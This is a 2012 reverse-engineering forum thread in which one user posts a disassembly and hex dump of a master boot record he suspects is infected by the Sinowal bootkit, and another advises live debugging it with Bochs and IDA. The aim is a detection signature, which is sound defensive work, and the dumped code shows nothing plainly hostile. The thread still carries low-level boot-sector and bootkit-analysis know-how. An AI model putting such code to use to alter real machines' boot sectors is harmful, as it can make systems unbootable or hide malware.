A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #11280  by Tigzy
 Thu Jan 26, 2012 8:30 am
Hello

It will be maybe help if I provide directly the code of the MBR ... ?
(still hanging on it...)
Code: Select all
seg000:0000                 xor     ax, ax
seg000:0002                 mov     ds, ax
seg000:0004                 mov     es, ax
seg000:0006                 mov     ss, ax
seg000:0008                 mov     sp, 7C00h
seg000:000B                 mov     si, 7C1Ah
seg000:000E                 mov     di, 600h
seg000:0011                 mov     cx, 1E6h
seg000:0014                 push    ax
seg000:0015                 push    di
seg000:0016                 cld
seg000:0017                 rep movsb
seg000:0019                 retf
seg000:001A ; ---------------------------------------------------------------------------
seg000:001A                 mov     si, 7A4h
seg000:001D                 mov     cl, 4
seg000:001F                 nop
seg000:0020
seg000:0020 loc_20:                                 ; CODE XREF: seg000:002Ej
seg000:0020                 cmp     byte ptr [si], 80h ; 'Ç'
seg000:0023                 jz      short loc_32
seg000:0025                 cmp     [si], ch
seg000:0027                 jnz     loc_E1
seg000:002B                 add     si, 10h
seg000:002E                 loop    loc_20
seg000:0030                 int     18h             ; TRANSFER TO ROM BASIC
seg000:0030                                         ; causes transfer to ROM-based BASIC (IBM-PC)
seg000:0030                                         ; often reboots a compatible; often has no effect at all
seg000:0032
seg000:0032 loc_32:                                 ; CODE XREF: seg000:0023j
seg000:0032                 mov     eax, [si+8]
seg000:0036                 mov     dx, [si]
seg000:0038                 mov     bx, sp
seg000:003A                 mov     cx, 1
seg000:003D                 call    sub_9A
seg000:0040
seg000:0040 loc_40:                                 ; DATA XREF: sub_CF+Dr
seg000:0040                 jnb     short loc_4E
seg000:0042                 mov     cx, [si+2]
seg000:0045                 mov     ax, 201h
seg000:0048                 int     13h             ; DISK - READ SECTORS INTO MEMORY
seg000:0048                                         ; AL = number of sectors to read, CH = track, CL = sector
seg000:0048                                         ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:0048                                         ; Return: CF set on error, AH = status, AL = number of sectors read
seg000:004A                 jb      near ptr loc_FB+1 ; DATA XREF: seg000:0048r
seg000:004A                                         ; sub_9A+9r ...
seg000:004E
seg000:004E loc_4E:                                 ; CODE XREF: seg000:loc_40j
seg000:004E                 mov     ax, 0AA55h
seg000:0051                 sub     ax, ds:7DFEh
seg000:0055                 jnz     near ptr loc_11D+1
seg000:0059                 xor     eax, eax
seg000:005C
seg000:005C loc_5C:                                 ; CODE XREF: seg000:0071j
seg000:005C                 cmp     [si+8], eax
seg000:0060
seg000:0060 loc_60:                                 ; DATA XREF: seg000:0030r
seg000:0060                 jb      short loc_6A
seg000:0062                 mov     eax, [si+8]
seg000:0066                 add     eax, [si+0Ch]
seg000:006A
seg000:006A loc_6A:                                 ; CODE XREF: seg000:loc_60j
seg000:006A                 add     si, 10h
seg000:006D                 cmp     si, 7E4h
seg000:0071                 jb      short loc_5C
seg000:0073                 or      eax, eax
seg000:0076                 jz      short loc_95
seg000:0078                 mov     cx, 9
seg000:007B                 add     bx, 200h
seg000:007F                 call    sub_9A
seg000:0082                 jb      short loc_95
seg000:0084                 mov     si, bx
seg000:0086                 add     bx, 200h
seg000:008A                 cmp     dword ptr [bx], 0B97C00BFh
seg000:0091                 jnz     short loc_95
seg000:0093                 call    bx
seg000:0095
seg000:0095 loc_95:                                 ; CODE XREF: seg000:0076j
seg000:0095                                         ; seg000:0082j ...
seg000:0095                 jmp     far ptr 0:7C00h
seg000:009A
seg000:009A ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:009A
seg000:009A
seg000:009A sub_9A          proc near               ; CODE XREF: seg000:003Dp
seg000:009A                                         ; seg000:007Fp
seg000:009A                 pushad
seg000:009C                 mov     dl, 80h ; 'Ç'
seg000:009E                 mov     bx, 55AAh
seg000:00A1                 mov     ah, 41h ; 'A'
seg000:00A3                 int     13h             ; DISK -
seg000:00A5                 jnb     short loc_AB
seg000:00A7
seg000:00A7 loc_A7:                                 ; CODE XREF: sub_9A+15j
seg000:00A7                                         ; sub_9A+1Aj
seg000:00A7                 stc
seg000:00A8                 popad
seg000:00AA                 retn
seg000:00AB ; ---------------------------------------------------------------------------
seg000:00AB
seg000:00AB loc_AB:                                 ; CODE XREF: sub_9A+Bj
seg000:00AB                 cmp     bx, 0AA55h
seg000:00AF                 jnz     short loc_A7
seg000:00B1                 test    cl, 1
seg000:00B4                 jz      short loc_A7
seg000:00B6                 popad
seg000:00B8                 pushad
seg000:00BA                 push    0
seg000:00BC                 push    0
seg000:00BE                 push    eax
seg000:00C0                 push    es
seg000:00C1                 push    bx
seg000:00C2                 push    cx
seg000:00C3                 push    10h
seg000:00C5                 mov     ah, 42h ; 'B'
seg000:00C7                 mov     si, sp
seg000:00C9                 int     13h             ; DISK -
seg000:00CB                 popa
seg000:00CC                 popad
seg000:00CE                 retn
seg000:00CE sub_9A          endp
seg000:00CE
seg000:00CF
seg000:00CF ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00CF
seg000:00CF
seg000:00CF sub_CF          proc near               ; CODE XREF: sub_CF+10j
seg000:00CF                                         ; seg000:loc_E1p
seg000:00CF                 pop     si
seg000:00D0                 lodsb
seg000:00D1
seg000:00D1 loc_D1:                                 ; CODE XREF: sub_CF+4j
seg000:00D1                 or      al, al
seg000:00D3                 jz      short loc_D1
seg000:00D5                 push    si
seg000:00D6                 push    ds
seg000:00D7                 mov     bx, 7
seg000:00DA                 mov     ah, 0Eh
seg000:00DC                 int     10h             ; - VIDEO - WRITE CHARACTER AND ADVANCE CURSOR (TTY WRITE)
seg000:00DC                                         ; AL = character, BH = display page (alpha modes)
seg000:00DC                                         ; BL = foreground color (graphics modes)
seg000:00DE                 pop     ds
seg000:00DF                 jmp     short sub_CF
seg000:00DF sub_CF          endp
Raw datas:
Code: Select all
seg000:0000  33 C0 8E D8 8E C0 8E D0  BC 00 7C BE 1A 7C BF 00  3+ÄÏÄ+Äð+.|¥|+.
seg000:0010  06 B9 E6 01 50 57 FC F3  A4 CB BE A4 07 B1 04 90  ¦µPW³¾ñ-¥ñ¦É
seg000:0020  80 3C 80 74 0D 38 2C 0F  85 B6 00 83 C6 10 E2 F0  Ç<Çt
8,¤àÂ.âãÔ­
seg000:0030  CD 18 66 8B 44 08 8B 14  8B DC B9 01 00 E8 5A 00  -fïDï¶ï_¦.ÞZ.
seg000:0040  73 0C 8B 4C 02 B8 01 02  CD 13 0F 82 AE 00 B8 55  sïL©-¤é«.©U
seg000:0050  AA 2B 06 FE 7D 0F 85 C5  00 66 33 C0 66 39 44 08  ¬+¦}¤à+.f3+f9D
seg000:0060  72 08 66 8B 44 08 66 03  44 0C 83 C6 10 81 FE E4  rfïDfDâãü¦õ
seg000:0070  07 72 E9 66 0B C0 74 1D  B9 09 00 81 C3 00 02 E8  rÚf+t¦	.ü+.Þ
seg000:0080  18 00 72 11 8B F3 81 C3  00 02 66 81 3F BF 00 7C  .rï¾ü+.fü?+.|
seg000:0090  B9 75 02 FF D3 EA 00 7C  00 00 66 60 B2 80 BB AA  ¦u ËÛ.|..f`¦Ç+¬
seg000:00A0  55 B4 41 CD 13 73 04 F9  66 61 C3 81 FB 55 AA 75  U¦A-s¨fa+ü¹U¬u
seg000:00B0  F6 F6 C1 01 74 F1 66 61  66 60 6A 00 6A 00 66 50  ÷÷-t±faf`j.j.fP
seg000:00C0  06 53 51 6A 10 B4 42 8B  F4 CD 13 61 66 61 C3 5E  SQj¦Bï¶-afa+^
seg000:00D0  AC 0A C0 74 FC 56 1E BB  07 00 B4 0E CD 10 1F EB  ¼
+t³V+.¦-Ù
seg000:00E0  EE E8 EB FF 49 6E 76 61  6C 69 64 20 70 61 72 74  ¯ÞÙ Invalid part
seg000:00F0  69 74 69 6F 6E 20 74 61  62 6C 65 00 E8 D0 FF 45  ition table.Þð E
seg000:0100  72 72 6F 72 20 6C 6F 61  64 69 6E 67 20 6F 70 65  rror loading ope
seg000:0110  72 61 74 69 6E 67 20 73  79 73 74 65 6D 00 E8 AE  rating system.Þ«
seg000:0120  FF 4D 69 73 73 69 6E 67  20 6F 70 65 72 61 74 69   Missing operati
seg000:0130  6E 67 20 73 79 73 74 65  6D 00 00 00 00 00 00 00  ng system.......
seg000:0140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:0190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01B0  00 00 00 00 00 2C 4A 7C  CD C2 CD C2 00 00 80 01  .....,J|----..Ç
seg000:01C0  01 00 07 FE BF 08 3F 00  00 00 8A B6 7F 00 00 00  .¦+?...èÂ...
seg000:01D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
seg000:01F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 55 AA  ..............U¬
 #11284  by EP_X0FF
 Thu Jan 26, 2012 10:49 am
Have you tried debugging?

FYI Sinowal has few versions, and IIRC this article explains first version.
As I understand you are trying to create a sort of dynamic signature for this, yes?
 #11291  by Tigzy
 Thu Jan 26, 2012 12:34 pm
Hello EP_X0FF!

No I didn't tried to debug, this is a bit more complicated than getting a dump and push it on IDA :cry:
I thought I could understand what this bootstrap does, but I don't.

The article I found seems to not be the one I got.
Yes, a signature is my aim. But for the moment, I only need some help to understand the code.
 #11292  by EP_X0FF
 Thu Jan 26, 2012 12:46 pm
You can use bochs + IDA Pro for live debugging of mbr.

Bochs is open emulator, IDA 6 become "eset gift freeware" since last year.

Additionally you will need Python support and special package required for mbr debugging, you can get it here.

http://hexblog.com/ida_pro/files/mbr_bochs.zip

As I remember Sinowal was using sort of mbr code morphing by adding garbage.
 #11294  by Tigzy
 Thu Jan 26, 2012 1:25 pm
Yes, but to debug the mbr it will need to be installed on the physical drive, right?
I can't debug from a dump file?

Just by looking at the code, you don't see anything suspicious that could help me?
I compared with std mbr, and found the loc_6a was not in a standard code...
 #11295  by EP_X0FF
 Thu Jan 26, 2012 1:31 pm
Tigzy wrote:Yes, but to debug the mbr it will need to be installed on the physical drive, right?
Guess why you need bochs. To debug mbr through it's image. See readme.txt in package.